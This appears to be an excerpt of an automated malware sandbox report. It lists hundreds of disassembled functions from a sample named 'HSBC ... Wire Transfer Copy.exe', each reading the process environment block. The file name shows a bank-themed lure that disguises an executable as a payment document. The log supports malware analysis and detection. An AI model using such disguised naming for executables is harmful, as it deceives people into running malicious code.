          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016A69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0165A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01652990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016F1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01640050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01640050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0165002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0165002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0165002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0165002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0165002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0163B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0163B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0163B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0163B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016BB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0165F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0165F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0165F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01629080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0162DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01653B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01653B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0162DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016F8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0162F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016D23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016D23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016D23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01654BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01654BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01654BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016F5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01631B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01631B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016DD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01652397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0165B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016F8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0166927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01629240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01629240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01629240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01629240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016EEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016B4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01664A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01664A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01638A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01625210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01625210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01625210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01625210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0162AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0162AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01643A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01652AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01652ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0163AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0163AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0165FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0165D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0165D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01663D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016A3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016D3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01647D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0162AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01633D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016EE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016F8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016AA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01654D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01654D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01654D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0163D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0163D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016EFDE2 mov eax, dword ptr fs:[00000030h]
